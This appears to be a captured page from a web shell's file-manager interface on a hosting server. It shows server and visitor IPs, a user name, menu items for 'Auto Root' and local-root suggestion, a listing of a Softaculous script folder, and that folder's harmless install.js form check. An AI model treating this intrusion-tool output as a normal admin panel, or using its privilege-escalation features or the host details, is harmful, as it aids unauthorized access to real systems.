Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
openclass /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-07-04 10:21
php53
[ DIR ]
drwxr-xr-x
2017-07-04 10:21
php56
[ DIR ]
drwxr-xr-x
2017-07-04 10:21
.htaccess
7.76
KB
-rw-r--r--
2015-04-28 08:31
auth.php
496
B
-rw-r--r--
2013-06-04 03:29
clone.php
6.81
KB
-rw-r--r--
2017-04-06 08:05
database.php
615
B
-rw-r--r--
2016-06-29 09:53
edit.php
5.52
KB
-rw-r--r--
2017-04-06 08:05
edit.xml
447
B
-rw-r--r--
2015-04-17 03:12
fileindex.php
201
B
-rw-r--r--
2017-04-06 05:45
import.php
4.58
KB
-rw-r--r--
2017-04-06 08:05
info.xml
2.07
KB
-rw-r--r--
2017-04-06 05:45
install.js
924
B
-rw-r--r--
2013-01-17 06:09
install.php
7.47
KB
-rw-r--r--
2017-04-06 08:05
install.xml
2.62
KB
-rw-r--r--
2016-11-11 06:28
md5
2.05
KB
-rw-r--r--
2017-04-06 08:05
notes.txt
1.02
KB
-rw-r--r--
2016-03-12 05:32
robots.txt
81
B
-rw-r--r--
2013-06-17 08:05
upgrade.php
9.13
KB
-rw-r--r--
2017-04-06 08:05
upgrade.xml
822
B
-rw-r--r--
2014-12-17 06:38
Save
Rename
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; };